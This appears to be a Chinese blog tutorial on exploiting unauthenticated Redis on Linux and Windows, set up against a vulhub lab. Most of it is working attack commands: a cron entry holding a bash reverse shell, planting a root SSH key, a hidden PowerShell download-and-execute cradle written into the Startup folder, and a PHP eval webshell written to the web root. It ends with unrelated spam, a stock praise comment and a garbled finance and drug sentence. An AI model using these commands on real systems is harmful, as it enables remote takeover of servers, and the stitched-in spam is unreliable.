首页 /
正文
一、环境搭建
Linux系统
直接使用vulhub靶场进行搭建地址如下:https://vulhub.org/#/docs/install-docker/
Windos系统
软件包下载地址:https://github.com/microsoftarchive/redis/releases
下载msi安装文件,安装redis
二、Linux系统Redis未授权访问GetShell
定时任务Getshell
//前提条件redis以root用户运行
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/IP/port 0>&1\n\n" //写入定时任务
config set dir /var/spool/cron
config set dbfilename root
save
攻击端监听1234端口,一分钟左右收到反弹shell
SSH公钥Getshell
//攻击机在/root/.ssh目录下生成一个公钥
ssh-keygen -t rsa
//更改公钥名后缀为txt,并且将该txt写入set 1中
(echo -e "\n";cat id_rsa.pub;echo -e "\n")>1.txt
cat 1.txt |redis-cli -h IP -a 123456 -x set 1
//链接redis
redis-cli -h IP -a 123456
get 1
config set dir /root/.ssh/
config set dbfilename authorized_keys
save
//远程链接
ssh root@IP
三、Windows系统Redis未授权访问GetShell
启动项GetShell(鸡肋)
1、使用redis-cli -h IP连接到Redis服务器上输入info查看是否连接成功
2、使用CS生成上线主机(这里也可以使用其他远控软件如:MSF)
生成poershell命令
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.254.134:80/a'))")")3、设置Wdinwos定时任务
192.168.254.130:6379> config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
OK
192.168.254.130:6379> CONFIG SET dbfilename shell.bat
OK
192.168.254.130:6379> set x "\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.254.134:80/a'))\"\n\r"
OK
192.168.254.130:6379> save
OK4.需要受害主机重启才能生效(鸡肋)
Web应用写shell
这种写Shell方式需要获取网站路径才行,假如现在已经获取网站绝对路径为D:phpstudy_proWWW
192.168.254.130:6379> CONFIG SET dir "D:/phpstudy_pro/WWW/test"
OK
192.168.254.130:6379> CONFIG sET dbfilename shell.php
OK
192.168.254.130:6379> set x "<?php @eval($_POST['admin'])?>"
OK
192.168.254.130:6379> save
OK
Awesome! Its genuinely amazing piece of writing, I have got much clear idea about from this paragraph.
Issuer services logged a strong increase of 24 relative to 1Q 13 due to increased corporate actions and technology reimbursements clomid by avents We are therefore revising our estimate to be 2